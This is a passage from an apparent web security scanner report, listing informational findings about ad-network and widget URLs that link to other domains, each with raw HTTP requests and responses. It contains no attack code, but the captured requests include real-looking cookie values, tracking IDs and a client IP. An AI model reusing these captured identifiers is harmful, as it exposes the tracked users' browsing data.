Cookie: xltl=eJxdjsFOwzAQRP%252FF90jetXft3Z5CG0QhQiKhLTdkx7FU9Yg4IMS%252Fk0bqpbc5vDczSVl%252Fv9SpOex3ZrMkVGOBYmHPEavlXKMEzBYniYGEfJGVW4z26WaUmgCAnfgIs5OpiicJzCUVSzPmKweg5vtcPke0fujWMSA1QM6KB0AOAmjvyf3rdh1hNdktJ6hQw1Sx8bbGJglKM2XGHEuZ0ny71g%252BLdVYICDZQuOtsdx9XDoOabduNXf84nixc3p5%252Fjv3Dy%252BH9cixu8Gbz9w%252BvWUoK; BFF=eJzllk1ugzAQhe%252FCCfwD2DibpEZVkQKNElSl2VRZdt1lm7vXxg4M4DFqsqqy9Tczz36JeT6rrFDfX4oSlbSUpM26KAqWrD4VFYysDOAqqV%252Bb9mX7%252FvFWHao2WZ2VTKM9mV%252BHY2AtD4ATGELzYcgJLI1qOQSm%252BMBIWjX6h1BLs47m8ioxUAhYD6Y9oid%252BrxToH4e9umq%252F1%252BNEtK%252FlEFAHNk9wijQkvwKwNq7mkPgz1%252BVhdOZhqwOFgPVg2iN6Auu9TLtvIjKOBmQMQGQMCchUzVtExtGAjAGIjCEBmU159DJ5QMbRgIwB0x7Rk8mgui7XeUEylgLAu3VYKcDJ2JpSKdICOzmDIB1OPu8aT51tAzbPoRxviUtqrln4twrRfNTOCKMEYj40z5gAFzVqhsbM0DEz9IIZOmaGXjJDR83QcTP0nMH7zezfTmL3mwX%252Bqv5%252By4AR3WWN2Ot4wCF7mVF7%252FVTUXtuM2nvdEmpvJ43a69sxe20zZm931xn2wXEU%252FxJkASO6Ho7b63jAITsTtddPRe21zai91y2h9nbSM1qopNxsa3tQODV1y5PCqnkOFZrlkN6uiX1%252Fd0iaGIB9f3fNZNC%252BNkcykSngz8e79X7hcsvD5NZXCP7YQN8Vf3pECCKQB4Mn8QcD%252Fi5YeALgSb8Q6nh2L8Q0nsZo8C7m7CPG6eOl5h3h%252BHgZeEfU%252FbNEQ%252FJrIa3wUELy5%252FIL0yupaA%253D%253D; TFF=eJydlEuShCAMQO%252FSJwjhE8BNH2O2LlxM1exmdl1990FF5GdXcGGB1nsmgcDslfavXy%252FQPwSoJwp4OufwMc0e%252Fevbiyk8hBAGOKbvhhcrLysep%252F019yhpPCOMoC5ITKQw8d%252FL1%252FIz%252Fy31v0WkdWWkKnS36gB95OuqN76sIWUWNa6xRsKggMROZobswa%252FTltdlnJ0v4kSPksYzwrdmP0RTQ%252FiU56RFrwabemqdtnxdg206JHqUNK5x7CN0972fWcaz41DSRjND2%252B1IoJO3Hb7uyI0vzkr0KGlcY4ukzRNArpHs1RlrukCdnhCWlLtlOicJ75jGgUbFNssq73r6pmfYns7WRloR7g22Kk8VoXMTX4mUPJ4RRm1G7wro3RW794EfWu%252FMY683JW0oktRjFZ380Pk6vMFTUkYc6vXMG1v70%252BP3eunRyJ7tGrdfA84i3%252F8vd03b; EVX=eJyVkEEOwyAMBP%252BSF3gNxmAeY%252BWYc49V%252Fl6aiFZUbZLeLM2yHjOb2n2xUorU2eQ5U70Zsk1Iml2dKToFdnFMdTG8aKZOBU475U6V0SgkOVHwtNMw0u0todP4QYO86bop5qbIg%252BLXNTguArLG0qpwVtXCqZBwvBhuiqlFw%252F%252BK40%252FwyQEhA4rrUvojOhavD7fjg8M%253D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:37:08 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-3
Content-Length: 147

<HTML><BODY><img src="http://ib.adnxs.com/getuid?http://loadm.exelator.com/load/?p=204&g=011&bi=$UID&j=0" width="1" height="1"></img></BODY></HTML>
18.104. http://media.fastclick.net/nai/remove  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /nai/remove

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /nai/remove?nocache=0.9673725 HTTP/1.1
Host: media.fastclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: pluto2=308875122887; pluto=308875122887

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:20:53 GMT
Location: http://www.networkadvertising.org/optout/opt_success.gif
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVo TAIo PSAo HISo OTPo OUR DELo BUS COM NAV INT DSP COR"
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/optout/opt_success.gif">here</a>
...[SNIP]...
18.105. http://media.fastclick.net/nai/verify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /nai/verify

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /nai/verify?nocache=0.6691378 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pluto2=140271031686; fastclick=optout

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:44:04 GMT
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVo TAIo PSAo HISo OTPo OUR DELo BUS COM NAV INT DSP COR"
Content-Length: 242
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>
...[SNIP]...
18.106. http://oo.afy11.net/NAIIsOptOut.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oo.afy11.net
Path:   /NAIIsOptOut.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /NAIIsOptOut.aspx?nocache=0.352743 HTTP/1.1
Host: oo.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=1,2*4e62cac9*sFHmM92-82*aKPj71Zsi6DAbl_rJvyOOzXGnw==*; a=AAAAAAAAAAAAAAAAAAAAAA; __qca=P0-1177288715-1316025191253

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Server: Microsoft-IIS/7.5
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:44:13 GMT
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>.</h2>
</body></html>
18.107. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.doubleclick.net
Path:   /cgi-bin/dclk/optoutnai.pl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cgi-bin/dclk/optoutnai.pl?action=test&state=status&nocache=0.9254898 HTTP/1.1
Host: optout.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Redirect
Content-Length: 181
Content-Type: text/html
Location: http://www.networkadvertising.org/verify/cookie_exists.gif
Server: Microsoft-IIS/6.0
Date: Sat, 17 Sep 2011 16:44:29 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.networkadvertising.org/verify/cookie_exists.gif">here</a></body>
18.108. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.doubleclick.net
Path:   /cgi-bin/dclk/optoutnai.pl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cgi-bin/dclk/optoutnai.pl?action=test&state=opt_out HTTP/1.1
Host: optout.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Redirect
Content-Length: 179
Content-Type: text/html
Location: http://www.networkadvertising.org/optout/opt_success.gif
Server: Microsoft-IIS/6.0
Date: Sat, 17 Sep 2011 17:17:38 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.networkadvertising.org/optout/opt_success.gif">here</a></body>
18.109. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.doubleclick.net
Path:   /cgi-bin/dclk/optoutnai.pl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cgi-bin/dclk/optoutnai.pl?action=test&state=status&nocache=0.8527755 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: optout.doubleclick.net

Response

HTTP/1.1 302 Redirect
Content-Length: 177
Content-Type: text/html
Location: http://www.networkadvertising.org/verify/no_cookie.gif
Server: Microsoft-IIS/6.0
Date: Sat, 17 Sep 2011 17:37:51 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.networkadvertising.org/verify/no_cookie.gif">here</a></body>
18.110. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.doubleclick.net
Path:   /cgi-bin/dclk/optoutnai.pl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cgi-bin/dclk/optoutnai.pl?action=test&state=status&nocache=0.3781508 HTTP/1.1
Host: optout.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Redirect
Content-Length: 181
Content-Type: text/html
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Server: Microsoft-IIS/6.0
Date: Sat, 17 Sep 2011 16:29:24 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a></body>
18.111. http://optout.ib-ibi.com:8000/VerifyCookieStatus.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.ib-ibi.com:8000
Path:   /VerifyCookieStatus.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /VerifyCookieStatus.aspx?nocache=0.7525983 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: optout.ib-ibi.com:8000

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.networkadvertising.org/verify/no_cookie.gif
Server: Microsoft-IIS/7.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 17:37:51 GMT
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/no_cookie.gif">here</a>.</h2>
</body></html>
18.112. http://optout.ib-ibi.com:8000/VerifyCookieStatus.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.ib-ibi.com:8000
Path:   /VerifyCookieStatus.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /VerifyCookieStatus.aspx?nocache=0.2779737 HTTP/1.1
Host: optout.ib-ibi.com:8000
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib-ibi.com-OptOut=IsOptOut=true

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Server: Microsoft-IIS/7.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:44:30 GMT
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>.</h2>
</body></html>
18.113. http://optout.mxptint.net/naistatus.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mxptint.net
Path:   /naistatus.ashx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /naistatus.ashx?nocache=0.1538429 HTTP/1.1
Host: optout.mxptint.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mxpim=optout

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:45:09 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>.</h2>
</body></html>
18.114. http://optout.mxptint.net/naistatus.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mxptint.net
Path:   /naistatus.ashx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /naistatus.ashx?nocache=0.6284675 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: optout.mxptint.net

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:37:52 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Location: http://www.networkadvertising.org/verify/no_cookie.gif
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/no_cookie.gif">here</a>.</h2>
</body></html>
18.115. http://pbid.pro-market.net/engine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /engine

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /engine?site=111778;size=1x1;kw=%20-%20Search%20for%20local%20businesses,%20events,%20and%20coupons%20near%20you;siteref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue;rnd=(1316295499352) HTTP/1.1
Host: pbid.pro-market.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
Cookie: anSt=0+4+jT2beH|oV~T<n4#E)_`zjW4wf*Qvx=eu!T<iaR@{Sq/yP&nYQ%J8`bOr))FB\!!7>g\2N$\$K\EZu'W~9Jr162wg:MyYeDw6H=`m&L`^PS@:^Azn!I61/ytF(`LCA!ZB0}3S5\!!LH]\2N$\$K\z5%vEThH>_B=#7tJy5e"N%U)(O~aq/'tziEX.Em|J0q=!o.tNsexTp@[J<T\!!7>g\2N$\$K; anTHS=42%7C1312579892800%23; anTD4=omMtz0ElZavIaEGuzNfzmpj8mdQ1xOk70fBZtnElvasmQ%7C_320100%7C122555%7C1312579892444%7C8%2C14%2C18%23omMtz0ElZavIaEGuzNfzmpj8mdQ1xOk70fBZtnElvasmQ%7C_160800%7C122555%7C1312579892444%7C8%2C4; anHistory=2vzuu3+2+!%11d$j#Q(515#$Y#N/F1Y9$K#KKk; anProfile=2vzuu3+0+s0=(6f)+h=bc+1m=1+rv=(-8)+1j=57:1+rt='32177B6A'+rs=c+1f=d+4=2lx

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: app2.ny
Pragma: no-cache
Cache-Control: no-cache
Expires: Mon, 1 Jan 1990 0:0:0 GMT
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:55:27 GMT
Connection: close

<html><body rightmargin=0 leftmargin=0 topmargin=0 bottommargin=0><SCRIPT LANGUAGE="JavaScript">
<!--
try {
var tcdacmd="dt";
var t="search+for+local+businesses+events+and+coupons+near+yo
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/18182/slf.js" LANGUAGE="JavaScript"></SCRIPT><IMG border=0 WIDTH=0 HEIGHT=0 src="http://a.collective-media.net/datapair?net=an&segs=gm&op=add&rnd=1316295499352">
</IMG><img src="http://osmdcs.interclick.com/pixel.aspx?dp=28F9F1BE-842F-48FF-9C06-C8D9C786C6B4&sid=115366&rnd=1316295499352" border="0" /><SCRIPT LANGUAGE="JavaScript">
...[SNIP]...
</script><img src="http://segment-pixel.invitemedia.com/pixel?pixelID=67807&partnerID=64&clientID=5216&key=segment&rnd=1316295499352" width="1" height="1" border="0" /></body>
...[SNIP]...
18.116. http://platform.twitter.com/widgets/follow_button.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://platform.twitter.com
Path:   /widgets/follow_button.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /widgets/follow_button.html?screen_name=localcom HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __utma=43838368.1721518288.1314976448.1315460719.1315936872.4; __utmz=43838368.1315936872.4.4.utmcsr=burlingtonfreepress.com|utmccn=(referral)|utmcmd=referral|utmcct=/apps/pbcs.dll/article; k=50.23.123.106.1316084567946622

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=1800
Last-Modified: Thu, 15 Sep 2011 22:21:23 GMT
ETag: "3ebb283771360ff6c4b4a3c255fe4ddc"
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:28:26 GMT
Content-Length: 33517
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<!DOCTYPE html><html><head><title>Twitter For Websites: Follow Button</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><link rel="profile" href="http://microformats.org/profile/hcard"><style type="text/css">
...[SNIP]...
18.117. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=DLSRD1&AP=1390 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1162228222-1314847229546; TOptOut=1; MC1=V=3&GUID=5ac4e212f4dc41e28ae541c631a9a2ed; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=53847eaa577b4a27af787123681cd00c&bd=2011-09-15T16:18:14.634&v=2; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; s_vnum=1318873684837%26vn%3D1; MSNTVID=5ac4e212f4dc41e28ae541c631a9a2ed; VWCUKP300=L123100/Q80830_15132_2078_091711_1_093011_489193x482893x091711x1x1; s_nr=1316282718696; mbox=session#1316281807974-204714#1316285017|PC#1316281807974-204714.19#1317492757|check#true#1316283217; Sample=3; zip=c:us

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1992
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8588141-T8330982-C113000000000040404
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 17 Sep 2011 16:27:56 GMT
Content-Length: 1992


//<![CDATA[
function getRADIds() { return{"adid":"113000000000040404","pid":"8588141","targetid":"8330982"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_538987059() {var adCode_538987059=new Array();adCode_538987059.push('<IFRAME MARGINWIDTH="0" MARGINHEIGHT="0" HEIGHT="90" FRAMEBORDER="0" WIDTH="728" SCROLLING="no" SRC="http://m.adnxs.com/tt?member=280&inv_code=DLSRD1&cb=538987059"></IFRAME>
...[SNIP]...
18.118. http://s.meebocdn.net/cim/script/feeds_v92_cim_11_12_5.en.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.meebocdn.net
Path:   /cim/script/feeds_v92_cim_11_12_5.en.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cim/script/feeds_v92_cim_11_12_5.en.js?1315867186 HTTP/1.1
Host: s.meebocdn.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=seventeen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Accept-Ranges: bytes
ETag: "3561791051"
Last-Modified: Mon, 12 Sep 2011 21:38:57 GMT
Server: lighttpd/1.4.19
Vary: Accept-Encoding
Cache-Control: max-age=194677
Expires: Mon, 19 Sep 2011 22:41:00 GMT
Date: Sat, 17 Sep 2011 16:36:23 GMT
Content-Length: 35420
Connection: close

// Copyright 2005-2010 Meebo, inc.
//
// RSA javascript implementation Copyright 1998-2005 David Shapiro
// please see http://www.ohdave.com/rsa/
// SHA256 javascript implementation Copyright 2003-200
...[SNIP]...
<m class="meebo-199"><a href="http://twitter.com/\'+\nthis.m_data.getSubjectUsername()+\'">\'+(this.m_data.getSubjectAlias()||\nthis.m_data.getSubjectUsername())+\'</a>
...[SNIP]...
</m>\'};\nthis._linkify=function(a){return function(a){return a.replace(/(^|[^&\\w\'"]+)\\#([a-zA-Z0-9_]+)/g,\nfunction(a,b,c){return b+\'#<a href="http://search.twitter.com/search?q=%23\'+\nc+\'">\'+c+"</a>"})}(function(a){return a.replace(/(^|[^\\w]+)\\@([a-zA-Z0-9_]{1,15}(\\/[a-zA-Z0-9-_]+)*)/g,\nfunction(a,b,c){return b+\'@<a href="http://twitter.com/\'+\nc+\'">\'+c+"</a>
...[SNIP]...
<m class="meebo-199"><a href="http://www.facebook.com/profile.php?id=\'+\nthis.m_data.getSubjectUsername()+\'">\'+this.m_data.getSubjectAlias()+\n"</a>
...[SNIP]...
18.119. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf?t=1316294786641&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.quickandsimple.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1308
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:36:43 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">


